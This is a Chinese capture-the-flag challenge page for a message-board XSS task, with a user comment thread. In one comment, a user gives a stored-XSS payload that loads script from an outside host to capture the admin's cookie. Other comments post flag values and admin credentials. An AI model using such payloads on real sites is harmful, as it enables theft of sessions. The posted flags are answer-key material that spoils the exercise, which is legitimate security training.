留言板WEB 未解决

分数: 10 金币: 3
题目作者: harry
一  血: ꧁༺༽༾ཊ彪ཏ༿༼༻꧂
一血奖励: 5金币
解  决: 3242
提  示: 题目无需登录后台!需要xss平台接收flag
描  述:
http协议需要http协议的xss平台
...
登录回复
评论
Striker123456 3年前
举报

尖括号字体实体,双引号转义,src自动加上http://。这怎么做?

回复 0
b1lld 3年前
举报

我说你们这些网站出题人是在干嘛啊?新手题官方wp写的那么简短,能缩写就整缩写,突出的就是一个边看文章边查才能体现你的深度是吧?一道入门题硬是要查几篇博客一顿查是吧?一道题本来好不容易搜到几篇wp能看的,咔咔一顿操作,做到一半发现原来的做题思路行不通了,哦,看下评论,题目改了。我说你们是在干嘛啊????新手题诶???建这个网站的目的不是让人学习吗??不是为了让人入门吗???不是为了让人按照一个思路去

回复 16
anguilin 3年前
举报

咋做

回复 0
skiller 3年前
举报

db.sql是怎么搜出来的?我用dir没搜出来啊?

回复 9
BugKugirl 3年前
举报

在线XSS平台(https://xss.pt/)生成xss代码(<sCRiPt sRC=//0x.ax/AUBv></sCrIpT>)放到留言板,xss平台直接获得cookie : flag=flag%7Bf7784e4107be555d08be73ac01569c6f%7D,将flag进行url解码(http://www.jsons.cn/urlencode)

回复 0
1317554973 3年前
举报

拿到xss得flag填进去但不对

回复 0
17695688750 3年前
举报

奥原来%7b和%7d是{}的asc码,我憨批了

回复 0
17695688750 3年前
举报

我插入了图片xss,平台给我回显了这个flag=flag%7B34211b64224e890f37244b7b065fc409%7D,有人知道怎么转译成正确的flag么

回复 0
zhaiwb 3年前
举报

%7b换成{}

回复 0
13509329442 3年前
举报

url解码

回复 0
泡椒控卫 3年前
举报

https://blog.csdn.net/m0_57954651/article/details/127621060

回复 0
不知名学渣 3年前
举报

管理员账号密码[admin,011be4d65feac1a8],就是不知道怎么来的,望大佬告知

回复 0
2478660446 3年前
举报

用xss在线平台可以试试 但是要等一段时间 flag=flag{7B57845943ba8c6225d2fbade764481e8d}

回复 0

WriteUp

image
丶我亚索贼六

5 金币

立即查看

评分(18)

解题动态

liqs 攻破了该题 1天前
AzKanna 攻破了该题 2天前
jsbba 攻破了该题 4天前
2686213396 攻破了该题 4天前
sdgkk1234 攻破了该题 5天前
2kniden 攻破了该题 6天前
乱来小木 攻破了该题 7天前
lanza2451150 攻破了该题 8天前
WindZQ 攻破了该题 10天前
言寺介 攻破了该题 17天前
19902457330 攻破了该题 17天前
hhhh3 攻破了该题 18天前
LL77 攻破了该题 18天前
丞丞 攻破了该题 18天前
橙zi 攻破了该题 18天前
1111a 攻破了该题 18天前
aqsdd 攻破了该题 18天前
dask 攻破了该题 18天前
popk 攻破了该题 18天前
梁华洁 攻破了该题 18天前
问题反馈